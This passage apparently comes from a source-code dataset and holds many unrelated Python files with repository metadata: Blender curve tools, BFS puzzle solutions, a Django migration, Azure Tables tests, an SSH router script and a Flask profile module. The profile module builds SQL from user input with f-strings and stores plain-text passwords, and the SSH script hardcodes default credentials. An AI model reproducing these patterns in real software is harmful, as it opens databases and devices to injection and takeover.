self.nurbs_order = Curve.data.splines[0].order_u
if len(Curve.data.splines) > 0: # do get initnial value for resampling t
polyline = Curve.data.splines[0] # take first spline len for resampling
if polyline.type == 'NURBS' or polyline.type == 'POLY':
self.t_in_y = len(polyline.points)
else:
self.t_in_y = len(polyline.bezier_points)
self.bezierRes = Curve.data.resolution_u
return self.execute(context)
def execute(self, context):
curveObj = context.active_object
if curveObj.type != 'CURVE':
self.report({'INFO'}, 'Works only on curves')
return {"CANCELLED"}
pointsList = []
pointsRadius = []
pointsTilt = []
selectedSplines = []
if self.onlySelection:
for polyline in curveObj.data.splines:
if polyline.type == 'NURBS' or polyline.type == 'POLY':
if any(point.select == True for point in polyline.points):
selectedSplines.append(polyline)
else:
if any(point.select_control_point == True for point in polyline.bezier_points):
selectedSplines.append(polyline)
if not selectedSplines:
selectedSplines = curveObj.data.splines
else:
selectedSplines = curveObj.data.splines
for polyline in selectedSplines: # for strand point
if polyline.type == 'NURBS' or polyline.type == 'POLY':
points = polyline.points
else:
points = polyline.bezier_points
if len(points) > 1: # skip single points
pointsList.append([point.co.to_3d() for point in points])
pointsRadius.append([point.radius for point in points])
pointsTilt.append([point.tilt for point in points])
backup_mat_indices = [spline.material_index for spline in selectedSplines]
interpolRad = []
interpolTilt = []
splinePointsList = interpol_Catmull_Rom(pointsList, self.t_in_y, uniform_spacing = self.uniformPointSpacing, same_point_count=self.equalPointCount)
if self.equalPointCount: # each output spline will have same point count
t_ins_y = [i / (self.t_in_y - 1) for i in range(self.t_in_y)]
for radii, tilts in zip(pointsRadius, pointsTilt): # per strand
t_rad = [i / (len(radii) - 1) for i in range(len(radii))]
interpolRad.append(np.interp(t_ins_y, t_rad, radii)) # first arg len() = out len
interpolTilt.append(np.interp(t_ins_y, t_rad, tilts)) # first arg len() = out len
else: # shorter output splines will have less points
lens = [len(x) for x in splinePointsList]
for radii, tilts, strandLen in zip(pointsRadius, pointsTilt, lens): # per strand
t_ins_Normalized = [i / (strandLen - 1) for i in range(strandLen)]
t_rad = [[i / (len(radii) - 1) for i in range(len(radii))]]
interpolRad.append(np.interp(t_ins_Normalized, t_rad[0], radii)) # first arg len() = out len
interpolTilt.append(np.interp(t_ins_Normalized, t_rad[0], tilts)) # first arg len() = out len
curveData = curveObj.data
# spline_type =
if self.onlySelection:
for spline in selectedSplines:
curveData.splines.remove(spline)
else:
curveData.splines.clear()
newSplines = []
for k, splinePoints in enumerate(splinePointsList): # for each strand/ring
curveLenght = len(splinePoints)
polyline = curveData.splines.new(self.hairType)
newSplines.append(polyline)
if self.hairType == 'BEZIER':
polyline.bezier_points.add(curveLenght - 1)
elif self.hairType == 'POLY' or self.hairType == 'NURBS':
polyline.points.add(curveLenght - 1)
if self.hairType == 'NURBS':
polyline.order_u = self.nurbs_order if self.input_spline_type == 'NURBS' else 3
polyline.use_endpoint_u = True
np_splinePointsOnes = np.ones((len(splinePoints), 4)) # 4 coord x,y,z ,1
np_splinePointsOnes[:, :3] = splinePoints
if self.hairType == 'BEZIER':
polyline.bezier_points.foreach_set('co', np_splinePointsOnes[:, :3])
polyline.bezier_points.foreach_set('radius', interpolRad[k])
polyline.bezier_points.foreach_set('tilt', interpolTilt[k])
polyline.bezier_points.foreach_set('handle_left_type', 'AUTO')
polyline.bezier_points.foreach_set('handle_right_type', 'AUTO')
else:
polyline.points.foreach_set('co', np_splinePointsOnes.ravel())
polyline.points.foreach_set('radius', interpolRad[k])
polyline.points.foreach_set('tilt', interpolTilt[k])
curveData.resolution_u = self.bezierRes
# bpy.ops.object.curve_uv_refresh()
for backup_mat, newSpline in zip(backup_mat_indices, newSplines):
newSpline.material_index = backup_mat
return {"FINISHED"}
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
712c8911fb30a81f68341c8d02607fc01373169c
|
bc2effb57e82128b81371fb03547689255d5ef15
|
/백준/그래프/13549(숨바꼭질 3).py
|
3e27f94ac43b4efa403bf096775a59d3e8e538cd
|
[] |
no_license
|
CharmingCheol/python-algorithm
|
393fa3a8921f76d25e0d3f02402eae529cc283ad
|
61c8cddb72ab3b1fba84171e03f3a36f8c672648
|
refs/heads/master
| 2023-03-01T11:00:52.801945
| 2021-01-31T13:38:29
| 2021-01-31T13:38:29
| 229,561,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
import sys
from collections import deque
MAX_SIZE = 100001
start, end = map(int, sys.stdin.readline().split())
board = [float("inf")] * MAX_SIZE
board[start] = 0
queue = deque()
queue.append((start, 0))
while queue:
now, value = queue.popleft()
if now == end:
print(board[now])
break
if value != board[now]: continue
if 0 <= now - 1 and value + 1 < board[now - 1]:
board[now - 1] = value + 1
queue.append((now - 1, value + 1))
if now + 1 < MAX_SIZE and value + 1 < board[now + 1]:
board[now + 1] = value + 1
queue.append((now + 1, value + 1))
if now * 2 < MAX_SIZE and value < board[now * 2]:
board[now * 2] = value
queue.append((now * 2, value))
|
[
"54410332+chamincheol@users.noreply.github.com"
] |
54410332+chamincheol@users.noreply.github.com
|
b64dcfd8310e0a91a5674a0426a212d4e4014f18
|
b12875980121be80628e3204a5a62fbbd6190222
|
/seesion7/minihack5.py
|
7dba52421d756d3b660a75259e7d867a584fab55
|
[] |
no_license
|
hoangstillalive/hoangstillalive
|
ef2eb9a173b346e75ac0a35c455cebacd1a9fe91
|
304e0087792857815090cb890e18086d1128df6f
|
refs/heads/master
| 2020-06-12T10:07:33.319139
| 2019-09-13T12:31:57
| 2019-09-13T12:31:57
| 194,267,120
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
side = int(input("Enter side of shape you like:"))
angle = 360/side
from turtle import*
shape("turtle")
for i in range(side):
forward(100)
left (angle)
mainloop()
|
[
"minhhoangtruong.a1@gmail.com"
] |
minhhoangtruong.a1@gmail.com
|
c0b608d437f149d8760c931ec9488e38f0fefb57
|
b7634e92ed147a34cdb017598c6d8dd41c0def96
|
/aula05/migrations/0002_categoria_comentario_post.py
|
3a636face480cf6e0fdc9a2f6b875eb3ce1d9fd2
|
[] |
no_license
|
mayronceccon/olist-django-labs
|
a4e9805489f4c9ad782f5085188dee342d4ac051
|
fbe6f314554e65f0a47dddc7c2c21165ccc1d828
|
refs/heads/master
| 2021-09-28T14:21:44.385979
| 2020-06-06T00:25:54
| 2020-06-06T00:25:54
| 240,728,135
| 1
| 0
| null | 2021-09-22T18:44:59
| 2020-02-15T14:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,411
|
py
|
# Generated by Django 3.0.3 on 2020-02-29 17:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('aula05', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Categoria',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titulo', models.CharField(max_length=254)),
('texto', models.TextField()),
('categorias', models.ManyToManyField(related_name='posts', to='aula05.Categoria')),
],
),
migrations.CreateModel(
name='Comentario',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('autor', models.CharField(max_length=30)),
('comentario', models.TextField()),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='aula05.Post')),
],
),
]
|
[
"mayron.ceccon@gmail.com"
] |
mayron.ceccon@gmail.com
|
b04ee7d509224ea32bcdc2abd3aa726509802b36
|
253296050582fbe0a8605353295ab27daae4deff
|
/main.py
|
32884c43658bae739d1868be5e5ce5b322bef693
|
[] |
no_license
|
qiita-scraper/qiita-scraper-rocket-chat
|
a44d95d125431670dda97b5614f92d0ee0d09098
|
86c1b6e0d4d889deb9a468cd85a1d0f93eb9cc20
|
refs/heads/master
| 2023-05-14T23:39:42.637110
| 2019-12-17T15:50:51
| 2019-12-17T15:50:51
| 228,154,303
| 4
| 0
| null | 2023-05-07T13:10:45
| 2019-12-15T08:43:31
|
Python
|
UTF-8
|
Python
| false
| false
| 1,461
|
py
|
import os
from rocket_chat import rocket_chat
from qiita import qiita
import yaml
def main():
url, user, password = __get_os_environ()
room_name, organization = __get_config()
q = qiita.Qiita()
rc = rocket_chat.RocketChat(url, user, password)
for user in q.fetch_organization_users(organization):
articles = q.fetch_recent_user_articles(user)
for yesterday_article in q.extract_yesterday_articles(articles):
msg = rc.format_message(user=user, title=yesterday_article['title'], article_url=yesterday_article['url'])
rc.send_message_to_rocket_chat(msg, room_name)
def __get_config():
f = open("config.yml", "r")
data = yaml.load(f)
room_name = data.get('rocket_chat').get('room_name')
organization = data.get('qiita').get('organization')
return room_name, organization
def __get_os_environ():
url = os.environ.get('ROCKET_CHAT_URL')
user = os.environ.get('ROCKET_CHAT_USER')
password = os.environ.get('ROCKET_CHAT_PASSWORD')
if url is None or len(url) == 0:
raise Exception('ROCKET_CHAT_URL is not set in environment variable')
if user is None or len(user) == 0:
raise Exception('ROCKET_CHAT_USER is not set in environment variable')
if password is None or len(password) == 0:
raise Exception('ROCKET_CHAT_PASSWORD is not set in environment variable')
return url, user, password
def handler(event, context):
main()
|
[
"daisuke.awaji@i.softbank.jp"
] |
daisuke.awaji@i.softbank.jp
|
bc54e1b48cf35f7afe4085bcfc57748031ff30b5
|
8ac0beeda7da3f6059f47dbd71f90a375589b8eb
|
/Ubiquiti/EdgeRouter-Lite.py
|
5c1e1a6a434fbfc723d8a192f78062264691d878
|
[] |
no_license
|
evgenyzorin/Paramiko
|
f98dbabdb0954c4e55ecd88604de6ba81d421e6c
|
9deb3d6d0491717524117dfd2c1a9cb4c968d016
|
refs/heads/main
| 2023-09-02T16:43:13.279258
| 2021-11-11T08:34:49
| 2021-11-11T08:34:49
| 390,994,305
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,628
|
py
|
from paramiko import SSHClient, AutoAddPolicy
from datetime import datetime
import re
start_time = datetime.now()
def send_show_command(
devices,
username,
password,
command,
max_bytes=60000,
delay=1,
):
client = SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(AutoAddPolicy())
info = {}
for device in devices:
print(f'\n---------- Connecting device {device} ----------\n')
client.connect(
hostname=device,
username=username,
password=password,
look_for_keys=False,
allow_agent=False,
)
stdin, stdout, sterr = client.exec_command(command)
output = stdout.readlines()
for line in output[3:]:
data = [i.strip() for i in line.split(' ') if i]
if re.search('[a-zA-Z]', data[0]):
interface = data[0]
info[interface] = {
'ip': [data[1]],
'state': data[2].split('/')[0],
'link': data[2].split('/')[1],
'description': data[3],
}
else:
info[interface]['ip'].append(data[0])
print(info)
if __name__ == '__main__':
devices = ['192.168.1.1', '192.168.1.2']
command = '/opt/vyatta/bin/vyatta-op-cmd-wrapper show interfaces'
send_show_command(devices, 'ubnt', 'ubnt', command)
run_time = datetime.now() - start_time
print(f'\n---------- Elapsed time: {run_time} ----------\n')
|
[
"noreply@github.com"
] |
evgenyzorin.noreply@github.com
|
7eaa3fc42b530ce553df3f478e57dfcb78907226
|
335efc133db52ce3dcbb114f6be1e2e5c308ab35
|
/backend/myprofile.py
|
677b25332bc919433660284ec8608f4900feeaf6
|
[] |
no_license
|
mrclauderandall/CS-Capstone-Project
|
12c9987713bf398fee838b6a1025fafbf3a8885d
|
cc599ac7d836360bfb78c80e4bbfb893bca39c2f
|
refs/heads/master
| 2023-06-29T13:16:56.207602
| 2021-08-09T02:51:34
| 2021-08-09T02:51:34
| 394,126,058
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,353
|
py
|
import psycopg2
from flask import jsonify
#
# Should we migrate these functions to user.py?
#
def myprofile(username, conn):
cur = conn.cursor()
cur.execute(
f"SELECT * FROM public.users WHERE email = '{username}'"
)
result = cur.fetchall()
conn.close()
return(jsonify(result))
def editprofile(email, first_name, last_name, password, username, conn):
cur = conn.cursor()
cur.execute(
f"UPDATE public.users SET first_name = '{first_name}', last_name = '{last_name}', password = '{password}', email = '{email}' WHERE email = '{username}'"
)
conn.commit()
conn.close()
return(jsonify(200))
def setDP(image_url, username, conn):
cur = conn.cursor()
cur.execute(
f"UPDATE public.users SET profile_pic = '{image_url}' WHERE email = '{username}'"
)
conn.commit()
conn.close()
return(jsonify(200))
def getDP(username, conn):
cur = conn.cursor()
cur.execute(
f"SELECT profile_pic FROM public.users WHERE email = '{username}'"
)
result = cur.fetchone()
conn.commit()
conn.close()
return (jsonify(result[0]))
def removeDP(username, conn):
cur = conn.cursor()
cur.execute(
f"UPDATE public.users SET profile_pic = NULL WHERE email = '{username}'"
)
conn.commit()
conn.close()
return(jsonify(200))
|
[
"mrclauderandall@gmail.com"
] |
mrclauderandall@gmail.com
|
a2f7ae216b410776277bf51f39352e0afd7a8354
|
cb892c75961eeae4e9c968403e823565d2b0056e
|
/periodic1D.py
|
ce67dcd6b4588f63f65e9a66e3aeef14fbdecd90
|
[] |
no_license
|
victorstorchan/signal-processing
|
7deb60ed1e3f7ae09553cbe0faf6fce3fec97fc8
|
a51e9855cb8cb7a63ecbab9fac645fc4846b03a7
|
refs/heads/master
| 2021-01-19T03:02:07.791676
| 2016-07-16T12:32:27
| 2016-07-16T12:32:27
| 52,238,889
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,917
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from cmath import polar
from math import sqrt
#definition of the boxcars signals
def boxcar(x,i):
if x-i<-1 or x-i>1:
return 0
else:
return 1
x= np.arange(-2.,2.,0.05)
n=len(x)
print(n)
True_signal=np.zeros(n)
for i in range(n):
True_signal[i]=boxcar(x[i],0)
#plt.plot(x,True_signal)
#plt.axis([-2,2,-1,2])
#plt.show()
#definitions of the shifted signals
y=np.zeros(n,dtype=complex)
y2=np.zeros(n,dtype=complex)
base=np.zeros(n,dtype=complex)
vector_of_shift=[0,3,10,30]#shifts are integer in discrete version
len_shift=len(vector_of_shift)
#signal with shift:
shifted_signals=np.zeros((len_shift,n),dtype=complex)
shifted_signals_1=np.zeros((len_shift,n),dtype=complex)
for k in range(n):
base[k]=boxcar(x[k],0)
max_shift=max(vector_of_shift)
base_period=np.lib.pad(base, (max_shift, 0), 'wrap')
for s in range(len_shift):
for k in range(n):
if k-vector_of_shift[s]<0:
y[k]=base_period[max_shift-vector_of_shift[s]-1+k]
y2[k]=base_period[max_shift-vector_of_shift[s]-1+k]*np.exp(2J*np.pi*k/n)
else:
y[k]=boxcar(x[k-vector_of_shift[s]],0)
y2[k]=boxcar(x[k-vector_of_shift[s]],0)*np.exp(2J*np.pi*k/n)
randvect=np.random.normal(0,0.1,n)
shifted_signals[s] =y#+ randvect
shifted_signals_1[s]=y2#+ randvect
A=np.fft.fft(shifted_signals)
A_1=np.fft.fft(shifted_signals_1).conjugate()
A_star=np.zeros((len_shift,n),dtype=complex)
for i in range(len_shift):
A_star[i] = A[i]*A_1[i]
A_star_matrix=np.matrix(A_star)
A_star_transpose=A_star_matrix.getH()
A_prod1=A_star_matrix*A_star_transpose
A_prod=A_prod1/A_prod1[0,0]
(V,sigma,V_star)=np.linalg.svd(A_prod,full_matrices=1)
v1=V_star[0].getH()
#the shifts are recovered:
output=np.zeros(len_shift,dtype=complex)
for i in range(len_shift):
output[i]=-n*polar(-v1[i,0])[1]/(2*np.pi)
output
|
[
"noreply@github.com"
] |
victorstorchan.noreply@github.com
|
65e50e3080ce522797d0807c4a9ccf3ad3d59230
|
9cb4b1707c9cf2cb2d45849a32625ddcd5d2ce15
|
/data_structures/graph/graph.py
|
76c5509f826c0cf30c80e238bb6245540194a1f8
|
[] |
no_license
|
paxzeno/CrackingTheCodingInterview
|
14b0a0bd8a8f9a0bf30defbd07c4e6d1c1b0a549
|
d082c704d8a2d4a4e61371091abb023a1dc5fa99
|
refs/heads/master
| 2020-04-26T17:24:55.098714
| 2019-03-16T17:35:03
| 2019-03-16T17:35:03
| 173,712,427
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,397
|
py
|
import random
import Queue
from node import Node
class RoadMap:
def __init__(self, queue):
self._queue = queue
self._path = {}
self._new_paths = set()
def get_queue(self):
return self._queue
def set_path(self, node_name, parent_node_name):
# think if there may be some bogus behavior,
# because of several parents could share the same child node
self._path[node_name] = parent_node_name
def get_path(self):
return self._path
def set_new_paths(self, paths):
self._new_paths = paths
def get_new_paths(self):
return self._new_paths
class Graph:
def __init__(self):
self._nodes = []
def add_node(self, node):
self._nodes.append(node)
def get_nodes(self):
return self._nodes
def generate_graph(self, number_nodes, max_number_children=4):
self._nodes = [None] * number_nodes
for i in xrange(0, number_nodes):
self._nodes[i] = Node(i)
for node in self._nodes:
# number of children this node will have from 1 to 4 Max
number_children = random.randint(1, max_number_children)
for j in xrange(0, number_children):
child_node_name = -1
while child_node_name == -1 or child_node_name == node.get_name():
child_node_name = random.randint(0, number_nodes - 1)
node.add_child(self._nodes[child_node_name])
def depth_first_search(self, node_name):
# to be implemented
return None
def breath_first_search(self, root_name, end_name):
node = self._nodes[root_name]
queue = Queue.Queue()
queue.put(node)
# TODO no need to have checked and path,
# TODO path can handle both functions
checked = set()
checked.add(node)
path = {}
while not queue.empty():
q_node = queue.get()
self.print_node(q_node)
for child_node in q_node.get_children():
if child_node.get_name() not in checked:
path[child_node.get_name()] = q_node.get_name()
checked.add(child_node.get_name())
if child_node.get_name() == end_name:
return self.print_path(path, root_name, end_name)
else:
queue.put(child_node)
return self.print_path(None)
def bidirectional_bfs_search(self, root_name, end_name):
root_node = self._nodes[root_name]
end_node = self._nodes[end_name]
root_queue = Queue.Queue()
root_queue.put(root_node)
root_road_map = RoadMap(root_queue)
found = False
while not root_road_map.get_queue().empty() and not found:
root_road_map = self.iterated_bfs_search(root_road_map)
if end_node in root_road_map.get_new_paths():
found = True
if found:
return self.print_path(root_road_map.get_path(), root_name, end_name)
return self.print_path(None)
def iterated_bfs_search(self, road_map):
queue = road_map.get_queue()
node = queue.get()
self.print_node(node)
children = node.get_children()
road_map.set_new_paths(children)
path = road_map.get_path()
for child_node in children:
if child_node.get_name() not in path:
road_map.set_path(child_node.get_name(), node.get_name())
queue.put(child_node)
return road_map
@staticmethod
def print_path(path, origin=None, end=None):
if path is None:
return 'No path found for the node'
route = str(end)
pointer = end
while pointer != origin:
route += ' -> ' + str(path[pointer])
pointer = path[pointer]
return route
@staticmethod
def print_node(node):
print_children = ', Child Nodes: ['
for child_node in node.get_children():
print_children += str(child_node.get_name()) + ';'
print_children += ']'
print('Node:' + str(node.get_name()) + print_children)
if __name__ == '__main__':
graph = Graph()
graph.generate_graph(20, 2)
print(graph.breath_first_search(0, 2))
print(graph.bidirectional_bfs_search(0, 2))
|
[
"paxzeno@gmail.com"
] |
paxzeno@gmail.com
|
15660f72a517e3b32ec05f1edde94a333241df3b
|
1a41addd7ca9486b5392158984f0e5c14d92edff
|
/tests.py
|
331c9c2324a88becd6a3d030e51f2608966da740
|
[
"MIT"
] |
permissive
|
humin11/sixquant
|
32e94c2d1035c87a5cad816dd1286613c54174cd
|
bf3614c34cdbd4373dcbfc0cb24f58a1d7957d47
|
refs/heads/master
| 2021-08-26T08:37:33.808255
| 2017-11-22T16:10:36
| 2017-11-22T16:10:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
# coding=utf-8
import os
import sys
import unittest
root = os.path.abspath(os.path.expanduser(__file__ + '/../tests'))
sys.path.append(root)
if __name__ == '__main__':
suite = unittest.TestSuite()
suite.addTest(unittest.defaultTestLoader.discover('tests'))
unittest.TextTestRunner().run(suite)
|
[
"caviler@gmail.com"
] |
caviler@gmail.com
|
bb7d789c7df59f3ef3d4b7d31cc5b89a64bbb3c6
|
51cbd904e17e45f6adb5303c3532a6ff0519ab42
|
/sdk/tables/azure-data-tables/tests/test_table_service_properties_cosmos.py
|
139f3c1973a4a4d8f57e5f7f63813ae8c7bfbeef
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
heaths/azure-sdk-for-python
|
203e9a6052d7dff5b5f2346bced86b9406be3419
|
77feaf14471eba6642f5c7ae2f3f06981ff361d7
|
refs/heads/master
| 2022-07-26T06:46:57.067502
| 2021-04-15T21:35:26
| 2021-04-15T21:35:26
| 239,629,447
| 0
| 0
|
MIT
| 2020-02-10T22:46:20
| 2020-02-10T22:46:19
| null |
UTF-8
|
Python
| false
| false
| 9,896
|
py
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import time
import pytest
from devtools_testutils import AzureTestCase
from azure.core.exceptions import HttpResponseError
from azure.data.tables import (
TableServiceClient,
TableAnalyticsLogging,
Metrics,
RetentionPolicy,
CorsRule
)
from _shared.testcase import TableTestCase
from preparers import CosmosPreparer
# ------------------------------------------------------------------------------
class TableServicePropertiesTest(AzureTestCase, TableTestCase):
# --Helpers-----------------------------------------------------------------
def _assert_properties_default(self, prop):
assert prop is not None
self._assert_logging_equal(prop['analytics_logging'], TableAnalyticsLogging())
self._assert_metrics_equal(prop['hour_metrics'], Metrics())
self._assert_metrics_equal(prop['minute_metrics'], Metrics())
self._assert_cors_equal(prop['cors'], list())
def _assert_logging_equal(self, log1, log2):
if log1 is None or log2 is None:
assert log1 == log2
return
assert log1.version == log2.version
assert log1.read == log2.read
assert log1.write == log2.write
assert log1.delete == log2.delete
self._assert_retention_equal(log1.retention_policy, log2.retention_policy)
def _assert_delete_retention_policy_equal(self, policy1, policy2):
if policy1 is None or policy2 is None:
assert policy1 == policy2
return
assert policy1.enabled == policy2.enabled
assert policy1.days == policy2.days
def _assert_static_website_equal(self, prop1, prop2):
if prop1 is None or prop2 is None:
assert prop1 == prop2
return
assert prop1.enabled == prop2.enabled
assert prop1.index_document == prop2.index_document
assert prop1.error_document404_path == prop2.error_document404_path
def _assert_delete_retention_policy_not_equal(self, policy1, policy2):
if policy1 is None or policy2 is None:
assert policy1 != policy2
return
assert not (policy1.enabled == policy2.enabled and policy1.days == policy2.days)
def _assert_metrics_equal(self, metrics1, metrics2):
if metrics1 is None or metrics2 is None:
assert metrics1 == metrics2
return
assert metrics1.version == metrics2.version
assert metrics1.enabled == metrics2.enabled
assert metrics1.include_apis == metrics2.include_apis
self._assert_retention_equal(metrics1.retention_policy, metrics2.retention_policy)
def _assert_cors_equal(self, cors1, cors2):
if cors1 is None or cors2 is None:
assert cors1 == cors2
return
assert len(cors1) == len(cors2)
for i in range(0, len(cors1)):
rule1 = cors1[i]
rule2 = cors2[i]
assert len(rule1.allowed_origins) == len(rule2.allowed_origins)
assert len(rule1.allowed_methods) == len(rule2.allowed_methods)
assert rule1.max_age_in_seconds == rule2.max_age_in_seconds
assert len(rule1.exposed_headers) == len(rule2.exposed_headers)
assert len(rule1.allowed_headers) == len(rule2.allowed_headers)
def _assert_retention_equal(self, ret1, ret2):
assert ret1.enabled == ret2.enabled
assert ret1.days == ret2.days
# --Test cases per service ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_table_service_properties(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
# Act
resp = tsc.set_service_properties(
analytics_logging=TableAnalyticsLogging(),
hour_metrics=Metrics(),
minute_metrics=Metrics(),
cors=list())
# Assert
assert resp is None
self._assert_properties_default(tsc.get_service_properties())
if self.is_live:
sleep(SLEEP_DELAY)
# --Test cases per feature ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_logging(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
logging = TableAnalyticsLogging(read=True, write=True, delete=True, retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(analytics_logging=logging)
# Assert
received_props = tsc.get_service_properties()
self._assert_logging_equal(received_props['analytics_logging'], logging)
if self.is_live:
time.sleep(30)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_hour_metrics(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
hour_metrics = Metrics(enabled=True, include_apis=True, retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(hour_metrics=hour_metrics)
# Assert
received_props = tsc.get_service_properties()
self._assert_metrics_equal(received_props['hour_metrics'], hour_metrics)
if self.is_live:
sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_minute_metrics(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
minute_metrics = Metrics(enabled=True, include_apis=True,
retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(minute_metrics=minute_metrics)
# Assert
received_props = tsc.get_service_properties()
self._assert_metrics_equal(received_props['minute_metrics'], minute_metrics)
if self.is_live:
sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_cors(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
cors_rule1 = CorsRule(['www.xyz.com'], ['GET'])
allowed_origins = ['www.xyz.com', "www.ab.com", "www.bc.com"]
allowed_methods = ['GET', 'PUT']
max_age_in_seconds = 500
exposed_headers = ["x-ms-meta-data*", "x-ms-meta-source*", "x-ms-meta-abc", "x-ms-meta-bcd"]
allowed_headers = ["x-ms-meta-data*", "x-ms-meta-target*", "x-ms-meta-xyz", "x-ms-meta-foo"]
cors_rule2 = CorsRule(
allowed_origins,
allowed_methods,
max_age_in_seconds=max_age_in_seconds,
exposed_headers=exposed_headers,
allowed_headers=allowed_headers)
cors = [cors_rule1, cors_rule2]
# Act
tsc.set_service_properties(cors=cors)
# Assert
received_props = tsc.get_service_properties()
self._assert_cors_equal(received_props['cors'], cors)
if self.is_live:
sleep(SLEEP_DELAY)
# --Test cases for errors ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_too_many_cors_rules(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
tsc = TableServiceClient(self.account_url(tables_cosmos_account_name, "cosmos"), tables_primary_cosmos_account_key)
cors = []
for i in range(0, 6):
cors.append(CorsRule(['www.xyz.com'], ['GET']))
# Assert
pytest.raises(HttpResponseError,
tsc.set_service_properties, None, None, None, cors)
if self.is_live:
sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_retention_too_long(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
tsc = TableServiceClient(self.account_url(tables_cosmos_account_name, "cosmos"), tables_primary_cosmos_account_key)
minute_metrics = Metrics(enabled=True, include_apis=True,
retention_policy=RetentionPolicy(enabled=True, days=366))
# Assert
pytest.raises(HttpResponseError,
tsc.set_service_properties,
None, None, minute_metrics)
if self.is_live:
sleep(SLEEP_DELAY)
class TestTableUnitTest(TableTestCase):
def test_retention_no_days(self):
# Assert
pytest.raises(ValueError, RetentionPolicy, True, None)
|
[
"noreply@github.com"
] |
heaths.noreply@github.com
|
6b6eff5bda3cf3377e02463065468ac0476d1bf8
|
38ecc2e4d128f2770c105673fba2c480a96d688f
|
/Задание №1 по наследованию.py
|
a44643ebcea89a7b2241ab2fc0a27647c14c4a1a
|
[] |
no_license
|
Valentin31121967/Class-
|
288c4b2cf430bcb1b6c3dd756d0040867125b2f9
|
078ab77356e9d6b7532622a2d32c5ea29fb7ffcb
|
refs/heads/master
| 2022-04-15T05:09:11.094751
| 2020-04-15T04:45:29
| 2020-04-15T04:45:29
| 255,808,474
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,352
|
py
|
# Задание №1. Взять задание из предыдущей лекции и отделить функции сохранения и загрузки в отдельный класс
import json
# Создаем новый класс User
class User:
# Функция конструктор класса User
def _init_(self):
self.first_name = None
self.middle_name = None
self.last_name = None
self.age = None
# Функция ввода данных пользователя
def input_info(self):
self.first_name = input("Input First Name: ")
self.middle_name = input("Input Middle Name: ")
self.last_name = input("Input Last Name: ")
self.age = input("Input Age: ")
# Функция сериализации данных в удобный вид для чтения на экране
def serialize(self):
return "First name: {}\n" \
"Middle name: {}\n"\
"Last name: {}\n" \
"Age : {}\n"\
.format(self.first_name, self.middle_name, self.last_name, self.age)
# Создаем дочерний класс Save_load_data (User)
class Save_load_data(User):
# Функция записи данных в отдельный файл
def fail_save(self):
fil = str(input("Введите с клавиатуры имя файла для записи на диск: "))
with open(fil, "w") as f:
data = {"first_name": self.first_name,
"middle_name": self.middle_name,
"last_name": self.last_name,
"age": self.age}
json.dump(data, f)
# Функция загрузки данных из отдельного файла
def fail_load(self):
fil = str(input("Введите с клавиатуры имя файла для загрузки с диска: "))
with open(fil, "r") as f:
data = json.loads(f.read())
self.first_name = data["first_name"]
self.last_name = data["last_name"]
self.middle_name = data["middle_name"]
self.age = data["age"]
print(data)
user = Save_load_data()
user.input_info()
print(user.serialize())
print(user.fail_save())
print(user.fail_load())
print(user)
|
[
